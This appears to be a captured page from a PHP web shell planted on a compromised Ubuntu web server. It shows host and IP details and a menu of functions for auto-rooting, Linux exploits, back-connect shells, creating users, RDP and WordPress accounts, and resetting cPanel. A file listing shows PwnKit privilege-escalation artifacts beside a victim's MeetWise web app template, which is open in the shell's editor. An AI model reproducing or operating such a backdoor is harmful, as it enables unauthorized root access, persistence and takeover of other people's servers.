Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
meetwize /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
index.html
1.31
KB
-rw-rw-rw-
maps.html
1.8
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
result.html
1.7
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous"> <link rel="stylesheet" href="{{url_for('static',filename='CSS/result.css')}}"/> <title>MeetWise</title> <script src="{{url_for('static',filename='JS/script1.js')}}"></script> </head> <body> <div class="container"> <h1>Welcome to MeetWise</h1> <h4>Find the best places to meet your friends easily</h4> <form id="locationForm" , method="post"> <input type="number" id="numFriends" name="numFriends" placeholder="Number of Friends" min="1" max="10" required="required" oninput="addLocationInputs()" /> <div id="locationInputs"> <!-- Location inputs will be added here dynamically --> </div> <div class="input-group"> <label for="meetingType" >Type of Place:</label> <input id="meetingType" name="meetingType" required="required"> </div> <button type="submit">Recommend Location</a> </form> </div> </body> </html>
Close